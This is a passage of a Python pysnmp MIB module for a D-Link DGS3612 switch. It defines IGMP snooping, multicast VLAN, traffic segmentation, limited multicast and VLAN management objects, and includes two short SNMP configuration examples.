swL2IGMPMulticastVlanReplacePriority = MibTableColumn((1, 3, 6, 1, 4, 1, 171, 11, 70, 10, 2, 11, 7, 1, 12), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 2))).clone(namedValues=NamedValues(("true", 1), ("false", 2)))).setMaxAccess("readcreate")
if mibBuilder.loadTexts: swL2IGMPMulticastVlanReplacePriority.setStatus('current')
if mibBuilder.loadTexts: swL2IGMPMulticastVlanReplacePriority.setDescription("Specifies that a packet's priority will be changed by the switch based on the remap priority. This flag will only take effect when remap priority is set.")
swL2IGMPMulticastVlanTagMemberPort = MibTableColumn((1, 3, 6, 1, 4, 1, 171, 11, 70, 10, 2, 11, 7, 1, 13), PortList()).setMaxAccess("readwrite")
if mibBuilder.loadTexts: swL2IGMPMulticastVlanTagMemberPort.setStatus('current')
if mibBuilder.loadTexts: swL2IGMPMulticastVlanTagMemberPort.setDescription('This object indicates the port list of the tag member ports of the IGMP snooping multicast VLAN.')
swL2IGMPForwardingTable = MibTable((1, 3, 6, 1, 4, 1, 171, 11, 70, 10, 2, 11, 8), )
if mibBuilder.loadTexts: swL2IGMPForwardingTable.setStatus('current')
if mibBuilder.loadTexts: swL2IGMPForwardingTable.setDescription('The table containing the current IGMP forwarding information captured by this device, provided that swL2DevCtrlIGMPSnooping and the swL2IGMPCtrlState of the associated VLAN entry are both enabled. Note that the priority of IGMP table entries is lower than the Filtering Table, i.e. if there is a table hash collision between the entries of the IGMP Table and the Filtering Table inside the switch H/W address table, then the Filtering Table entry overwrites the colliding entry of the IGMP Table. See the swL2FilterMgmt description as well.')
swL2IGMPForwardingEntry = MibTableRow((1, 3, 6, 1, 4, 1, 171, 11, 70, 10, 2, 11, 8, 1), ).setIndexNames((0, "DGS3612-L2MGMT-MIB", "swL2IGMPForwardingVid"), (0, "DGS3612-L2MGMT-MIB", "swL2IGMPForwardingSrcIp"), (0, "DGS3612-L2MGMT-MIB", "swL2IGMPForwardingGroupAddr"))
if mibBuilder.loadTexts: swL2IGMPForwardingEntry.setStatus('current')
if mibBuilder.loadTexts: swL2IGMPForwardingEntry.setDescription('Information about the current IGMP forwarding information captured by this device, provided that swL2DevCtrlIGMPSnooping and the swL2IGMPCtrlState of the associated VLAN entry are both enabled.')
swL2IGMPForwardingVid = MibTableColumn((1, 3, 6, 1, 4, 1, 171, 11, 70, 10, 2, 11, 8, 1, 1), Integer32().subtype(subtypeSpec=ValueRangeConstraint(0, 65535))).setMaxAccess("readonly")
if mibBuilder.loadTexts: swL2IGMPForwardingVid.setStatus('current')
if mibBuilder.loadTexts: swL2IGMPForwardingVid.setDescription('This object indicates the Vid of the individual IGMP table entry. It shows the Vid of the IGMP report information captured on the network.')
swL2IGMPForwardingSrcIp = MibTableColumn((1, 3, 6, 1, 4, 1, 171, 11, 70, 10, 2, 11, 8, 1, 2), IpAddress()).setMaxAccess("readonly")
if mibBuilder.loadTexts: swL2IGMPForwardingSrcIp.setStatus('current')
if mibBuilder.loadTexts: swL2IGMPForwardingSrcIp.setDescription('This object identifies the source IP address.')
swL2IGMPForwardingGroupAddr = MibTableColumn((1, 3, 6, 1, 4, 1, 171, 11, 70, 10, 2, 11, 8, 1, 3), IpAddress()).setMaxAccess("readonly")
if mibBuilder.loadTexts: swL2IGMPForwardingGroupAddr.setStatus('current')
if mibBuilder.loadTexts: swL2IGMPForwardingGroupAddr.setDescription('This object identifies the group IP address.')
swL2IGMPForwardingPortMember = MibTableColumn((1, 3, 6, 1, 4, 1, 171, 11, 70, 10, 2, 11, 8, 1, 4), PortList()).setMaxAccess("readonly")
if mibBuilder.loadTexts: swL2IGMPForwardingPortMember.setStatus('current')
if mibBuilder.loadTexts: swL2IGMPForwardingPortMember.setDescription('This object indicates which ports belong to the same multicast group, on a per-VLAN basis.')
swL2IGMPMulticastVlanGroupTable = MibTable((1, 3, 6, 1, 4, 1, 171, 11, 70, 10, 2, 11, 9), )
if mibBuilder.loadTexts: swL2IGMPMulticastVlanGroupTable.setStatus('current')
if mibBuilder.loadTexts: swL2IGMPMulticastVlanGroupTable.setDescription('The table containing the IGMP snooping multicast VLAN group information.')
swL2IGMPMulticastVlanGroupEntry = MibTableRow((1, 3, 6, 1, 4, 1, 171, 11, 70, 10, 2, 11, 9, 1), ).setIndexNames((0, "DGS3612-L2MGMT-MIB", "swL2IGMPMulticastVlanGroupVid"), (0, "DGS3612-L2MGMT-MIB", "swL2IGMPMulticastVlanGroupRangeName"))
if mibBuilder.loadTexts: swL2IGMPMulticastVlanGroupEntry.setStatus('current')
if mibBuilder.loadTexts: swL2IGMPMulticastVlanGroupEntry.setDescription('Information about current IGMP snooping multicast VLAN group.')
swL2IGMPMulticastVlanGroupVid = MibTableColumn((1, 3, 6, 1, 4, 1, 171, 11, 70, 10, 2, 11, 9, 1, 1), Integer32().subtype(subtypeSpec=ValueRangeConstraint(0, 65535))).setMaxAccess("readonly")
if mibBuilder.loadTexts: swL2IGMPMulticastVlanGroupVid.setStatus('current')
if mibBuilder.loadTexts: swL2IGMPMulticastVlanGroupVid.setDescription('This object indicates the Vid of IGMP snooping multicast VLAN group.')
swL2IGMPMulticastVlanGroupRangeName = MibTableColumn((1, 3, 6, 1, 4, 1, 171, 11, 70, 10, 2, 11, 9, 1, 2), DisplayString().subtype(subtypeSpec=ValueSizeConstraint(1, 32))).setMaxAccess("readonly")
if mibBuilder.loadTexts: swL2IGMPMulticastVlanGroupRangeName.setStatus('current')
if mibBuilder.loadTexts: swL2IGMPMulticastVlanGroupRangeName.setDescription('The name of multicast address range.')
swL2IGMPMulticastVlanGroupHead = MibTableColumn((1, 3, 6, 1, 4, 1, 171, 11, 70, 10, 2, 11, 9, 1, 3), IpAddress()).setMaxAccess("readonly")
if mibBuilder.loadTexts: swL2IGMPMulticastVlanGroupHead.setStatus('current')
if mibBuilder.loadTexts: swL2IGMPMulticastVlanGroupHead.setDescription('The head of multicast address range.')
swL2IGMPMulticastVlanGroupTail = MibTableColumn((1, 3, 6, 1, 4, 1, 171, 11, 70, 10, 2, 11, 9, 1, 4), IpAddress()).setMaxAccess("readonly")
if mibBuilder.loadTexts: swL2IGMPMulticastVlanGroupTail.setStatus('current')
if mibBuilder.loadTexts: swL2IGMPMulticastVlanGroupTail.setDescription('The tail of multicast address range.')
swIGMPSnoopingGroupTable = MibTable((1, 3, 6, 1, 4, 1, 171, 11, 70, 10, 2, 11, 11), )
if mibBuilder.loadTexts: swIGMPSnoopingGroupTable.setStatus('current')
if mibBuilder.loadTexts: swIGMPSnoopingGroupTable.setDescription('The table contains the current IGMP snooping group information captured by the device.')
swIGMPSnoopingGroupEntry = MibTableRow((1, 3, 6, 1, 4, 1, 171, 11, 70, 10, 2, 11, 11, 1), ).setIndexNames((0, "DGS3612-L2MGMT-MIB", "swIGMPSnoopingGroupVid"), (0, "DGS3612-L2MGMT-MIB", "swIGMPSnoopingGroupGroupAddr"), (0, "DGS3612-L2MGMT-MIB", "swIGMPSnoopingGroupSourceAddr"))
if mibBuilder.loadTexts: swIGMPSnoopingGroupEntry.setStatus('current')
if mibBuilder.loadTexts: swIGMPSnoopingGroupEntry.setDescription('Information about the current IGMP snooping group information which has been captured by the device.')
swIGMPSnoopingGroupVid = MibTableColumn((1, 3, 6, 1, 4, 1, 171, 11, 70, 10, 2, 11, 11, 1, 1), Integer32().subtype(subtypeSpec=ValueRangeConstraint(1, 4094))).setMaxAccess("readonly")
if mibBuilder.loadTexts: swIGMPSnoopingGroupVid.setStatus('current')
if mibBuilder.loadTexts: swIGMPSnoopingGroupVid.setDescription('This object indicates the VID of the individual IGMP snooping group table entry.')
swIGMPSnoopingGroupGroupAddr = MibTableColumn((1, 3, 6, 1, 4, 1, 171, 11, 70, 10, 2, 11, 11, 1, 2), IpAddress()).setMaxAccess("readonly")
if mibBuilder.loadTexts: swIGMPSnoopingGroupGroupAddr.setStatus('current')
if mibBuilder.loadTexts: swIGMPSnoopingGroupGroupAddr.setDescription('This object identifies the group IP address which has been captured from the IGMP packet, on a per-VLAN basis.')
swIGMPSnoopingGroupSourceAddr = MibTableColumn((1, 3, 6, 1, 4, 1, 171, 11, 70, 10, 2, 11, 11, 1, 3), IpAddress()).setMaxAccess("readonly")
if mibBuilder.loadTexts: swIGMPSnoopingGroupSourceAddr.setStatus('current')
if mibBuilder.loadTexts: swIGMPSnoopingGroupSourceAddr.setDescription('This object identifies the source addresses.')
swIGMPSnoopingGroupIncludePortMap = MibTableColumn((1, 3, 6, 1, 4, 1, 171, 11, 70, 10, 2, 11, 11, 1, 4), PortList()).setMaxAccess("readonly")
if mibBuilder.loadTexts: swIGMPSnoopingGroupIncludePortMap.setStatus('current')
if mibBuilder.loadTexts: swIGMPSnoopingGroupIncludePortMap.setDescription('This object indicates the port list under INCLUDE mode.')
swIGMPSnoopingGroupExcludePortMap = MibTableColumn((1, 3, 6, 1, 4, 1, 171, 11, 70, 10, 2, 11, 11, 1, 5), PortList()).setMaxAccess("readonly")
if mibBuilder.loadTexts: swIGMPSnoopingGroupExcludePortMap.setStatus('current')
if mibBuilder.loadTexts: swIGMPSnoopingGroupExcludePortMap.setDescription('This object indicates the port list under EXCLUDE mode.')
swL2IGMPSnoopingStaticGroupTable = MibTable((1, 3, 6, 1, 4, 1, 171, 11, 70, 10, 2, 11, 16), )
if mibBuilder.loadTexts: swL2IGMPSnoopingStaticGroupTable.setStatus('current')
if mibBuilder.loadTexts: swL2IGMPSnoopingStaticGroupTable.setDescription('The table contains the current IGMP snooping static group information captured by the device.')
swL2IGMPSnoopingStaticGroupEntry = MibTableRow((1, 3, 6, 1, 4, 1, 171, 11, 70, 10, 2, 11, 16, 1), ).setIndexNames((0, "DGS3612-L2MGMT-MIB", "swL2IGMPSnoopingStaticGroupVID"), (0, "DGS3612-L2MGMT-MIB", "swL2IGMPSnoopingStaticGroupIPaddress"))
if mibBuilder.loadTexts: swL2IGMPSnoopingStaticGroupEntry.setStatus('current')
if mibBuilder.loadTexts: swL2IGMPSnoopingStaticGroupEntry.setDescription('Information about the current IGMP snooping static groups captured by the device.')
swL2IGMPSnoopingStaticGroupVID = MibTableColumn((1, 3, 6, 1, 4, 1, 171, 11, 70, 10, 2, 11, 16, 1, 1), Integer32().subtype(subtypeSpec=ValueRangeConstraint(1, 4094))).setMaxAccess("readonly")
if mibBuilder.loadTexts: swL2IGMPSnoopingStaticGroupVID.setStatus('current')
if mibBuilder.loadTexts: swL2IGMPSnoopingStaticGroupVID.setDescription('This object indicates the VID of the current IGMP snooping static group.')
swL2IGMPSnoopingStaticGroupIPaddress = MibTableColumn((1, 3, 6, 1, 4, 1, 171, 11, 70, 10, 2, 11, 16, 1, 2), IpAddress()).setMaxAccess("readonly")
if mibBuilder.loadTexts: swL2IGMPSnoopingStaticGroupIPaddress.setStatus('current')
if mibBuilder.loadTexts: swL2IGMPSnoopingStaticGroupIPaddress.setDescription('This object indicates the current IGMP snooping static group IP address. ')
swL2IGMPSnoopingStaticGroupMemberPortList = MibTableColumn((1, 3, 6, 1, 4, 1, 171, 11, 70, 10, 2, 11, 16, 1, 3), PortList()).setMaxAccess("readwrite")
if mibBuilder.loadTexts: swL2IGMPSnoopingStaticGroupMemberPortList.setStatus('current')
if mibBuilder.loadTexts: swL2IGMPSnoopingStaticGroupMemberPortList.setDescription('This object indicates the current IGMP snooping static group member port list.')
swL2IGMPSnoopingStaticGroupRowStatus = MibTableColumn((1, 3, 6, 1, 4, 1, 171, 11, 70, 10, 2, 11, 16, 1, 4), RowStatus()).setMaxAccess("readcreate")
if mibBuilder.loadTexts: swL2IGMPSnoopingStaticGroupRowStatus.setStatus('current')
if mibBuilder.loadTexts: swL2IGMPSnoopingStaticGroupRowStatus.setDescription('This object indicates the status of this entry.')
swL2TrafficSegTable = MibTable((1, 3, 6, 1, 4, 1, 171, 11, 70, 10, 2, 14, 1), )
if mibBuilder.loadTexts: swL2TrafficSegTable.setStatus('current')
if mibBuilder.loadTexts: swL2TrafficSegTable.setDescription('This table specifies that a port can only forward traffic to a specific port list.')
swL2TrafficSegEntry = MibTableRow((1, 3, 6, 1, 4, 1, 171, 11, 70, 10, 2, 14, 1, 1), ).setIndexNames((0, "DGS3612-L2MGMT-MIB", "swL2TrafficSegPort"))
if mibBuilder.loadTexts: swL2TrafficSegEntry.setStatus('current')
if mibBuilder.loadTexts: swL2TrafficSegEntry.setDescription('A list of information specifying each port and its traffic forwarding list.')
swL2TrafficSegPort = MibTableColumn((1, 3, 6, 1, 4, 1, 171, 11, 70, 10, 2, 14, 1, 1, 1), Integer32().subtype(subtypeSpec=ValueRangeConstraint(0, 65535))).setMaxAccess("readonly")
if mibBuilder.loadTexts: swL2TrafficSegPort.setStatus('current')
if mibBuilder.loadTexts: swL2TrafficSegPort.setDescription('The port number of the logical port.')
swL2TrafficSegForwardPorts = MibTableColumn((1, 3, 6, 1, 4, 1, 171, 11, 70, 10, 2, 14, 1, 1, 2), PortList()).setMaxAccess("readwrite")
if mibBuilder.loadTexts: swL2TrafficSegForwardPorts.setStatus('current')
if mibBuilder.loadTexts: swL2TrafficSegForwardPorts.setDescription('The list of ports to which the specified port can forward traffic.')
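
# --- Illustrative usage sketch (not part of the generated MIB definitions) ---
# A hedged example of restricting port 3 so it may only forward traffic to
# ports 1 and 2. The connection parameters are hypothetical; the PortList
# value follows the same MSB-first bitmask convention as elsewhere in this MIB.
def _example_set_traffic_segmentation():
    from pysnmp.hlapi import (setCmd, SnmpEngine, CommunityData,
                              UdpTransportTarget, ContextData, ObjectType,
                              ObjectIdentity, OctetString)
    errorIndication, errorStatus, errorIndex, varBinds = next(setCmd(
        SnmpEngine(),
        CommunityData('private'),                  # hypothetical write community
        UdpTransportTarget(('192.0.2.1', 161)),    # hypothetical switch address
        ContextData(),
        ObjectType(ObjectIdentity('DGS3612-L2MGMT-MIB',
                                  'swL2TrafficSegForwardPorts', 3),  # port 3
                   OctetString(hexValue='c0000000'))))               # ports 1 and 2
    if errorIndication or errorStatus:
        print(errorIndication or errorStatus.prettyPrint())
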
swL2IpLimitedMulticastTable = MibTable((1, 3, 6, 1, 4, 1, 171, 11, 70, 10, 2, 15, 1), )
if mibBuilder.loadTexts: swL2IpLimitedMulticastTable.setStatus('current')
if mibBuilder.loadTexts: swL2IpLimitedMulticastTable.setDescription("This entity's per-port Limited IP multicast address range table.")
swL2IpLimitedMulticastEntry = MibTableRow((1, 3, 6, 1, 4, 1, 171, 11, 70, 10, 2, 15, 1, 1), ).setIndexNames((0, "DGS3612-L2MGMT-MIB", "swL2IpLimitedMulticastPortIndex"))
if mibBuilder.loadTexts: swL2IpLimitedMulticastEntry.setStatus('current')
if mibBuilder.loadTexts: swL2IpLimitedMulticastEntry.setDescription('An entry of the per-port limited IP multicast address range table. Once an entry has been created, it should not be modified; only create and delete actions are supported.')
swL2IpLimitedMulticastPortIndex = MibTableColumn((1, 3, 6, 1, 4, 1, 171, 11, 70, 10, 2, 15, 1, 1, 1), Integer32().subtype(subtypeSpec=ValueRangeConstraint(0, 65535))).setMaxAccess("readonly")
if mibBuilder.loadTexts: swL2IpLimitedMulticastPortIndex.setStatus('current')
if mibBuilder.loadTexts: swL2IpLimitedMulticastPortIndex.setDescription('The port on which to configure the limited multicast address.')
swL2IpLimitedMulticastHead = MibTableColumn((1, 3, 6, 1, 4, 1, 171, 11, 70, 10, 2, 15, 1, 1, 2), IpAddress())
if mibBuilder.loadTexts: swL2IpLimitedMulticastHead.setStatus('obsolete')
if mibBuilder.loadTexts: swL2IpLimitedMulticastHead.setDescription('The head of multicast address range.')
swL2IpLimitedMulticastTail = MibTableColumn((1, 3, 6, 1, 4, 1, 171, 11, 70, 10, 2, 15, 1, 1, 3), IpAddress())
if mibBuilder.loadTexts: swL2IpLimitedMulticastTail.setStatus('obsolete')
if mibBuilder.loadTexts: swL2IpLimitedMulticastTail.setDescription('The tail of multicast address range.')
swL2IpLimitedMulticastAccess = MibTableColumn((1, 3, 6, 1, 4, 1, 171, 11, 70, 10, 2, 15, 1, 1, 4), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(0, 1, 2))).clone(namedValues=NamedValues(("none", 0), ("permit", 1), ("deny", 2)))).setMaxAccess("readwrite")
if mibBuilder.loadTexts: swL2IpLimitedMulticastAccess.setStatus('current')
if mibBuilder.loadTexts: swL2IpLimitedMulticastAccess.setDescription('This object allows you to permit or deny the multicast range.')
swL2IpLimitedMulticastState = MibTableColumn((1, 3, 6, 1, 4, 1, 171, 11, 70, 10, 2, 15, 1, 1, 5), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 2, 3))).clone(namedValues=NamedValues(("other", 1), ("disabled", 2), ("enabled", 3)))).setMaxAccess("readwrite")
if mibBuilder.loadTexts: swL2IpLimitedMulticastState.setStatus('current')
if mibBuilder.loadTexts: swL2IpLimitedMulticastState.setDescription('Enables or disables the limited multicast address function for the chosen port.')
swL2IpLimitedMulticastDelState = MibTableColumn((1, 3, 6, 1, 4, 1, 171, 11, 70, 10, 2, 15, 1, 1, 6), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 2))).clone(namedValues=NamedValues(("valid", 1), ("invalid", 2))))
if mibBuilder.loadTexts: swL2IpLimitedMulticastDelState.setStatus('obsolete')
if mibBuilder.loadTexts: swL2IpLimitedMulticastDelState.setDescription('Enables or disables deletion of the limited multicast address for the chosen port.')
swL2IpLimitedMulticastRangeName = MibTableColumn((1, 3, 6, 1, 4, 1, 171, 11, 70, 10, 2, 15, 1, 1, 7), DisplayString().subtype(subtypeSpec=ValueSizeConstraint(0, 32))).setMaxAccess("readwrite")
if mibBuilder.loadTexts: swL2IpLimitedMulticastRangeName.setStatus('current')
if mibBuilder.loadTexts: swL2IpLimitedMulticastRangeName.setDescription('The name of multicast address range. When read, it shows NULL.')
swL2IpLimitedMulticastRangeNameState = MibTableColumn((1, 3, 6, 1, 4, 1, 171, 11, 70, 10, 2, 15, 1, 1, 8), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 2, 3, 4))).clone(namedValues=NamedValues(("other", 1), ("add", 2), ("delete", 3), ("deleteAll", 4)))).setMaxAccess("readwrite")
if mibBuilder.loadTexts: swL2IpLimitedMulticastRangeNameState.setStatus('current')
if mibBuilder.loadTexts: swL2IpLimitedMulticastRangeNameState.setDescription('Adds or deletes the specified multicast address range. When read, it shows other(1). When set to add(2) or delete(3), swL2IpLimitedMulticastRangeName must also be set and must not be NULL. When set to deleteAll(4), all multicast address ranges on this port are deleted. The configured multicast range names can be retrieved from swL2LimitedMulticastAddressTable.')
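
# --- Illustrative usage sketch (not part of the generated MIB definitions) ---
# A hedged example of the add flow described above: bind a hypothetical
# range name to port 1 by setting swL2IpLimitedMulticastRangeName together
# with swL2IpLimitedMulticastRangeNameState = add(2) in one SET request.
def _example_add_limited_multicast_range():
    from pysnmp.hlapi import (setCmd, SnmpEngine, CommunityData,
                              UdpTransportTarget, ContextData, ObjectType,
                              ObjectIdentity, Integer32, OctetString)
    errorIndication, errorStatus, errorIndex, varBinds = next(setCmd(
        SnmpEngine(),
        CommunityData('private'),                  # hypothetical write community
        UdpTransportTarget(('192.0.2.1', 161)),    # hypothetical switch address
        ContextData(),
        ObjectType(ObjectIdentity('DGS3612-L2MGMT-MIB',
                                  'swL2IpLimitedMulticastRangeName', 1),
                   OctetString('iptv-range')),     # hypothetical range name
        ObjectType(ObjectIdentity('DGS3612-L2MGMT-MIB',
                                  'swL2IpLimitedMulticastRangeNameState', 1),
                   Integer32(2))))                 # 2 = add
    if errorIndication or errorStatus:
        print(errorIndication or errorStatus.prettyPrint())
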
swL2LimitedMulticastAddressTable = MibTable((1, 3, 6, 1, 4, 1, 171, 11, 70, 10, 2, 15, 2), )
if mibBuilder.loadTexts: swL2LimitedMulticastAddressTable.setStatus('current')
if mibBuilder.loadTexts: swL2LimitedMulticastAddressTable.setDescription('A table containing the limited multicast address information.')
swL2LimitedMulticastAddressEntry = MibTableRow((1, 3, 6, 1, 4, 1, 171, 11, 70, 10, 2, 15, 2, 1), ).setIndexNames((0, "DGS3612-L2MGMT-MIB", "swL2LimitedMulticastAddressPort"), (0, "DGS3612-L2MGMT-MIB", "swL2LimitedMulticastAddressRangeName"))
if mibBuilder.loadTexts: swL2LimitedMulticastAddressEntry.setStatus('current')
if mibBuilder.loadTexts: swL2LimitedMulticastAddressEntry.setDescription('The information of limited multicast address.')
swL2LimitedMulticastAddressPort = MibTableColumn((1, 3, 6, 1, 4, 1, 171, 11, 70, 10, 2, 15, 2, 1, 1), Integer32().subtype(subtypeSpec=ValueRangeConstraint(0, 65535))).setMaxAccess("readonly")
if mibBuilder.loadTexts: swL2LimitedMulticastAddressPort.setStatus('current')
if mibBuilder.loadTexts: swL2LimitedMulticastAddressPort.setDescription('The port index.')
swL2LimitedMulticastAddressRangeName = MibTableColumn((1, 3, 6, 1, 4, 1, 171, 11, 70, 10, 2, 15, 2, 1, 2), DisplayString().subtype(subtypeSpec=ValueSizeConstraint(1, 32))).setMaxAccess("readonly")
if mibBuilder.loadTexts: swL2LimitedMulticastAddressRangeName.setStatus('current')
if mibBuilder.loadTexts: swL2LimitedMulticastAddressRangeName.setDescription('The name of multicast address range.')
swL2LimitedMulticastAddressHead = MibTableColumn((1, 3, 6, 1, 4, 1, 171, 11, 70, 10, 2, 15, 2, 1, 3), IpAddress()).setMaxAccess("readonly")
if mibBuilder.loadTexts: swL2LimitedMulticastAddressHead.setStatus('current')
if mibBuilder.loadTexts: swL2LimitedMulticastAddressHead.setDescription('The head of multicast address range.')
swL2LimitedMulticastAddressTail = MibTableColumn((1, 3, 6, 1, 4, 1, 171, 11, 70, 10, 2, 15, 2, 1, 4), IpAddress()).setMaxAccess("readonly")
if mibBuilder.loadTexts: swL2LimitedMulticastAddressTail.setStatus('current')
if mibBuilder.loadTexts: swL2LimitedMulticastAddressTail.setDescription('The tail of multicast address range.')
swL2VlanTable = MibTable((1, 3, 6, 1, 4, 1, 171, 11, 70, 10, 2, 17, 1), )
if mibBuilder.loadTexts: swL2VlanTable.setStatus('current')
if mibBuilder.loadTexts: swL2VlanTable.setDescription('A table containing current configuration information for each VLAN currently configured into the device by (local or network) management, or dynamically created as a result of GVRP requests received.')
swL2VlanEntry = MibTableRow((1, 3, 6, 1, 4, 1, 171, 11, 70, 10, 2, 17, 1, 1), ).setIndexNames((0, "DGS3612-L2MGMT-MIB", "swL2VlanIndex"))
if mibBuilder.loadTexts: swL2VlanEntry.setStatus('current')
if mibBuilder.loadTexts: swL2VlanEntry.setDescription('Information for a VLAN configured into the device by (local or network) management, or dynamically created as a result of GVRP requests received.')
swL2VlanIndex = MibTableColumn((1, 3, 6, 1, 4, 1, 171, 11, 70, 10, 2, 17, 1, 1, 1), VlanId())
if mibBuilder.loadTexts: swL2VlanIndex.setStatus('current')
if mibBuilder.loadTexts: swL2VlanIndex.setDescription('The VLAN ID of the VLAN to be created. The range is 1 - 4094.')
swL2VlanName = MibTableColumn((1, 3, 6, 1, 4, 1, 171, 11, 70, 10, 2, 17, 1, 1, 2), DisplayString().subtype(subtypeSpec=ValueSizeConstraint(0, 32))).setMaxAccess("readonly")
if mibBuilder.loadTexts: swL2VlanName.setStatus('current')
if mibBuilder.loadTexts: swL2VlanName.setDescription('The name of the VLAN to be displayed.')
swL2VlanType = MibTableColumn((1, 3, 6, 1, 4, 1, 171, 11, 70, 10, 2, 17, 1, 1, 3), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(0, 1, 2, 3, 4, 5))).clone(namedValues=NamedValues(("invalid-vlan-type", 0), ("static-1q-vlan", 1), ("dynamic-vlan", 2), ("port-base-vlan", 3), ("protocolvlan", 4), ("double-vlan", 5)))).setMaxAccess("readonly")
if mibBuilder.loadTexts: swL2VlanType.setStatus('current')
if mibBuilder.loadTexts: swL2VlanType.setDescription('The type of the VLAN to be displayed.')
swL2VlanMemberPorts = MibTableColumn((1, 3, 6, 1, 4, 1, 171, 11, 70, 10, 2, 17, 1, 1, 4), PortList()).setMaxAccess("readonly")
if mibBuilder.loadTexts: swL2VlanMemberPorts.setStatus('current')
if mibBuilder.loadTexts: swL2VlanMemberPorts.setDescription('The set of member ports of the VLAN.')
swL2VlanStaticPorts = MibTableColumn((1, 3, 6, 1, 4, 1, 171, 11, 70, 10, 2, 17, 1, 1, 5), PortList()).setMaxAccess("readonly")
if mibBuilder.loadTexts: swL2VlanStaticPorts.setStatus('current')
if mibBuilder.loadTexts: swL2VlanStaticPorts.setDescription('The set of static ports of the VLAN.')
swL2VlanStaticTaggedPorts = MibTableColumn((1, 3, 6, 1, 4, 1, 171, 11, 70, 10, 2, 17, 1, 1, 6), PortList()).setMaxAccess("readonly")
if mibBuilder.loadTexts: swL2VlanStaticTaggedPorts.setStatus('current')
if mibBuilder.loadTexts: swL2VlanStaticTaggedPorts.setDescription('Specifies the additional ports as tagged.')
swL2VlanStaticUntaggedPorts = MibTableColumn((1, 3, 6, 1, 4, 1, 171, 11, 70, 10, 2, 17, 1, 1, 7), PortList()).setMaxAccess("readonly")
if mibBuilder.loadTexts: swL2VlanStaticUntaggedPorts.setStatus('current')
if mibBuilder.loadTexts: swL2VlanStaticUntaggedPorts.setDescription('Specifies the additional ports as untagged.')
swL2VlanForbiddenPorts = MibTableColumn((1, 3, 6, 1, 4, 1, 171, 11, 70, 10, 2, 17, 1, 1, 8), PortList()).setMaxAccess("readonly")
if mibBuilder.loadTexts: swL2VlanForbiddenPorts.setStatus('current')
if mibBuilder.loadTexts: swL2VlanForbiddenPorts.setDescription('The set of ports which are prohibited by management from being included in the egress list for this VLAN. Changes to this object that cause a port to be included or excluded affect the per-port per-VLAN Registrar control for Registration Forbidden for the relevant GVRP state machine on each port. A port may not be added in this set if it is already a member of the set of ports in dot1qVlanStaticEgressPorts. The default value of this object is a string of zeros of appropriate length, excluding all ports from the forbidden set.')
swL2VlanCurrentTaggedPorts = MibTableColumn((1, 3, 6, 1, 4, 1, 171, 11, 70, 10, 2, 17, 1, 1, 9), PortList()).setMaxAccess("readonly")
if mibBuilder.loadTexts: swL2VlanCurrentTaggedPorts.setStatus('current')
if mibBuilder.loadTexts: swL2VlanCurrentTaggedPorts.setDescription('The set of ports which are transmitting traffic for this VLAN as tagged frames.')
swL2VlanCurrentUntaggedPorts = MibTableColumn((1, 3, 6, 1, 4, 1, 171, 11, 70, 10, 2, 17, 1, 1, 10), PortList()).setMaxAccess("readonly")
if mibBuilder.loadTexts: swL2VlanCurrentUntaggedPorts.setStatus('current')
if mibBuilder.loadTexts: swL2VlanCurrentUntaggedPorts.setDescription('The set of ports which are transmitting traffic for this VLAN as untagged frames.')
swL2VlanAdvertisementState = MibTableColumn((1, 3, 6, 1, 4, 1, 171, 11, 70, 10, 2, 17, 1, 1, 11), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 2, 3))).clone(namedValues=NamedValues(("other", 1), ("disabled", 2), ("enabled", 3)))).setMaxAccess("readwrite")
if mibBuilder.loadTexts: swL2VlanAdvertisementState.setStatus('current')
if mibBuilder.loadTexts: swL2VlanAdvertisementState.setDescription('Specifies whether the VLAN is able to join GVRP. If this parameter is not set, the VLAN cannot be configured to have forbidden ports. For a protocol VLAN, this flag is fixed to disabled.')
swL2PVIDAutoAssignmentState = MibScalar((1, 3, 6, 1, 4, 1, 171, 11, 70, 10, 2, 17, 2), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 2))).clone(namedValues=NamedValues(("enabled", 1), ("disabled", 2)))).setMaxAccess("readwrite")
if mibBuilder.loadTexts: swL2PVIDAutoAssignmentState.setStatus('current')
if mibBuilder.loadTexts: swL2PVIDAutoAssignmentState.setDescription("This object controls the PVID auto-assignment state. If 'Auto-assign PVID' is disabled, the PVID can only be changed by explicit PVID configuration by the user; the VLAN configuration will not automatically change the PVID. If 'Auto-assign PVID' is enabled, the PVID can be changed by either PVID or VLAN configuration. When a user adds a port to VLAN X's untagged membership, the port's PVID is updated to VLAN X. In the form of a VLAN list command, the PVID is updated with the last item of the VLAN list. When a user removes a port from the untagged membership of the PVID's VLAN, the port's PVID is assigned the 'default VLAN'.")
swL2dot1vProtocolGroupTable = MibTable((1, 3, 6, 1, 4, 1, 171, 11, 70, 10, 2, 18, 1), )
if mibBuilder.loadTexts: swL2dot1vProtocolGroupTable.setReference('IEEE 802.1v clause 8.6.4')
if mibBuilder.loadTexts: swL2dot1vProtocolGroupTable.setStatus('current')
if mibBuilder.loadTexts: swL2dot1vProtocolGroupTable.setDescription('A table that contains mappings from Protocol Templates to Protocol Group Identifiers used for Port-and-Protocol-based VLAN Classification.')
swL2dot1vProtocolGroupEntry = MibTableRow((1, 3, 6, 1, 4, 1, 171, 11, 70, 10, 2, 18, 1, 1), ).setIndexNames((0, "DGS3612-L2MGMT-MIB", "swL2dot1vProtocolTemplateFrameType"), (0, "DGS3612-L2MGMT-MIB", "swL2dot1vProtocolTemplateProtocolValue"))
if mibBuilder.loadTexts: swL2dot1vProtocolGroupEntry.setStatus('current')
if mibBuilder.loadTexts: swL2dot1vProtocolGroupEntry.setDescription('A mapping from a Protocol Template to a Protocol Group Identifier.')
swL2dot1vProtocolTemplateFrameType = MibTableColumn((1, 3, 6, 1, 4, 1, 171, 11, 70, 10, 2, 18, 1, 1, 1), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 2, 3))).clone(namedValues=NamedValues(("ethernet", 1), ("rfc1042", 2), ("llcOther", 3)))).setMaxAccess("readonly")
if mibBuilder.loadTexts: swL2dot1vProtocolTemplateFrameType.setReference('IEEE 802.1v clause 8.6.2')
